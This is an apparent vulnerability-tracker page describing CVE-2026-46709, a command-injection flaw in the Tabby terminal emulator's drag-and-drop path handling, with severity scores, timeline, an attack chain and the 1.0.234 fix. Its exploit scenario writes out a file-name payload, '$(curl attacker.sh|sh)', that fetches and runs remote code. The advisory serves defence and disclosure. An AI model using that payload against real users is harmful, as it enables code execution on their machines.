Skip to main content

Tabby CVE-2026-46709

| EUVDEUVD-2026-44692 HIGH
Command Injection (CWE-77)
2026-07-15 GitHub_M
7.8
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
7.8 HIGH
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
vuln.today AI
7.8 HIGH

AV:L and UI:R because the attacker must get the victim to locally drop a file and press Enter; PR:N as no app authentication is needed; C/I/A:H reflect full shell code execution.

3.1 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

4
Patch available
Jul 15, 2026 - 17:48 EUVD
Source Code Evidence Fetched
Jul 15, 2026 - 15:46 vuln.today
Analysis Generated
Jul 15, 2026 - 15:46 vuln.today
CVE Published
Jul 15, 2026 - 14:59 cve.org
HIGH 7.8

DescriptionCVE.org

Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.234, Tabby inserts dropped file paths from tabby-electron/src/pathDrop.ts into the active shell without neutralizing command substitution metacharacters such as $(…) and , so the incomplete CVE-2026-45038 fix for control characters still allows code execution when the victim presses Enter. This issue is fixed in version 1.0.234.

AnalysisAI

Command injection in Tabby (formerly Terminus) terminal emulator before 1.0.234 lets an attacker achieve code execution by tricking a victim into dragging and dropping a crafted file whose path contains shell command-substitution metacharacters ($(...) or backticks). Because the drop handler in tabby-electron/src/pathDrop.ts inserted the raw path into the active shell without neutralizing these characters, the payload runs when the victim presses Enter. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft file with $(...) payload in path
Delivery
Deliver file to victim
Exploit
Victim drops file onto Tabby terminal
Execution
Unescaped path inserted into shell
Persist
Victim presses Enter
Impact
Command substitution executes as victim

Vulnerability AssessmentAI

Exploitation Exploitation requires that the victim run a vulnerable Tabby build (before 1.0.234), receive an attacker-controlled file whose filesystem path contains shell command-substitution metacharacters such as $(...) or backticks, drag-and-drop that file onto an active terminal tab, and then press Enter to submit the inserted line. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score is 7.8 (High) with vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, indicating high confidentiality, integrity and availability impact but requiring a local vector and user interaction. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a file whose name/path embeds a command-substitution payload such as $(curl attacker.sh|sh) and delivers it to the victim via a zip, shared folder, or download. The victim drags the file onto their Tabby terminal, which inserts the unescaped path into the active shell; when the victim presses Enter to run what looks like a normal command, the embedded substitution executes with the victim's privileges. …
Remediation Vendor-released patch: 1.0.234 - upgrade Tabby to version 1.0.234 or later, which introduces shell-type-aware path quoting (fix commit e151472b951bbd472ddc0545ec8656e4c0f352da and advisory GHSA-mq9v-2pgm-fxgh at https://github.com/Eugeny/tabby/security/advisories/GHSA-mq9v-2pgm-fxgh). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours, inventory all systems running Tabby versions prior to 1.0.234 and communicate to users that drag-and-drop file operations pose security risk; disable drag-and-drop functionality if the application supports this setting. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-46709 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy